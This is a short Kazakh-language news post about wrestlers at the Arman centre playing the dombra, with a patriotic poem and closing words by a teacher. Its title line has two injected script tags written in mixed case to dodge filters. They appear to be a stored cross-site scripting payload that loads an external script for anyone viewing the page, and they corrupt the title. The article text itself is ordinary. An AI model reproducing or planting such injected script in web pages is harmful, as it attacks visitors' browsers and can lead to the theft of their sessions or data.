Рухты көтеретін музыка<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
26.01.2024
Арман орталығы Қазақ күресінің палуандары қазақтың ұлттық аспабымен боз кілем үстінде күй тартып, керемет әуен тыңдап рухты көтеретін аспаптын құдыретті күшін тағы бір мәрте көрсетті.
Бойымды қазақ қаны билеген,
Қос ішегі бір-біріне тимеген,
Қазағымның домбырасы күй тартса,
Тебіреніп, ерекше бір күйге енем.
Қос ішекті домбыраның әуезді үніне қазақ даласы мен қазақ жұртының қуанышы мен қайғысын, асқақ арманы мен биік белестерін арқалап әкелген сан түрлі күйлер сыйды. Сол күмбірлеген аспап үні әлі күнге дейін қазақ халқының көңіліне ерекше рух сыйлайды.
Спорт пен өнерді тең ұстап, нағыз қазақ домбыра екенін ұмыт қылмай, киелі аспапты қадір тұту бізге парыз, келешекке аманат.
Педагог Токанов Төлеби Сайранұлы.
Просмотров: 295